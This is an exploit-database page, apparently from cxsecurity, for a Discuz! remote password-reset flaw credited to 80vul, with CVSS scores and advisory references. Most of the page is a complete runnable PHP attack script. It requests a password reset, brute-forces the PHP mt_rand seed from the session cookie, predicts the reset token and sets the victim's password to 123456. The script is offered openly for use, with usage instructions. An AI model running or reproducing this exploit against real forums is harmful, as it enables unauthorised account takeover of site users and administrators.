Discuz! Remote Reset User Password Exploit

2009.08.14
Credit: 80vul
Risk: High
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ Discuz! Reset User Password Exploit by 80vul team: http://www.80vul.com +---------------------------------------------------------------------------+ '); if ($argc < 6) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user mail uid host: target server (ip/hostname) path: path to discuz user: user login name mail: user login mail uid: user login id Example: php '.$argv[0].' localhost /discuz/ 80vul 80vul@80vul.com 2 +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $mail = $argv[4]; $uid = $argv[5]; $fp = fsockopen($host, 80); $data = "GET ".$path."viewthread.php HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Keep-Alive: 300\r\n"; $data .= "Connection: keep-alive\r\n\r\n"; fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) { $resp .= fread($fp, 1024); preg_match('/&amp;formhash=([a-z0-9]{8})/', $resp, $hash); if ($hash) break; } if ($hash) { $cmd = 'action=lostpasswd&username='.urlencode($user).'&email='.urlencode($mail).'&lostpwsubmit=true&formhash='.$hash[1]; $data = "POST ".$path."member.php HTTP/1.1\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Referer: http://$host$path\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ".strlen($cmd)."\r\n"; $data .= "Connection: close\r\n\r\n"; $data .= $cmd; fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); fclose($fp); preg_match('/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid); if (!$sid) exit("Exploit Failed!\n"); $seed = getseed(); if ($seed) { mt_srand($seed); random(); mt_rand(); $id = random(); $fp = fsockopen($host, 80); $cmd = 'action=getpasswd&uid='.$uid.'&id='.$id.'&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash='.$hash[1]; $data = "POST ".$path."member.php HTTP/1.1\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Referer: http://$host$path\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ".strlen($cmd)."\r\n"; $data .= "Connection: close\r\n\r\n"; $data .= $cmd; fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); if (strpos($resp, '&#230;&#65533;&#65533;&#65533;&#229;&#175;&#65533;&#65533;&#229;&#183;&#178;&#65533;&#65533;&#230;&#65533;&#232;&#174;&#190;&#189;&#174;&#239;&#188;&#65533;&#232;&#175;&#183;&#189;&#191;&#65533;&#230;&#65533;&#229;&#175;&#65533;&#65533;&#65533;&#187;&#229;&#189;&#65533;&#227;&#65533;&#65533;') !== false) exit("Expoilt Success!\nUser New Password:\t123456\n"); else exit("Exploit Failed!\n"); } else exit("Exploit Failed!\n"); } else exit("Exploit Failed!\n"); function getseed() { global $sid; for ($seed = 0; $seed <= 1000000; $seed ++) { mt_srand($seed); $id = random(6); if ($id == $sid[1]) return $seed; } return false; } function random($length = 6) { $hash = ''; $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; $max = strlen($chars) - 1; for ($i = 0; $i < $length; $i ++) $hash .= $chars[mt_rand(0, $max)]; return $hash; } ?>

References:

http://xforce.iss.net/xforce/xfdb/46785
http://www.securityfocus.com/bid/32424
http://www.milw0rm.com/exploits/7185
http://www.discuz.net/archiver/?tid-1112426.html
http://www.80vul.com/dzvul/sodb/14/dz-exp-sodb-2008-14_php.htm
http://secunia.com/advisories/32731


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top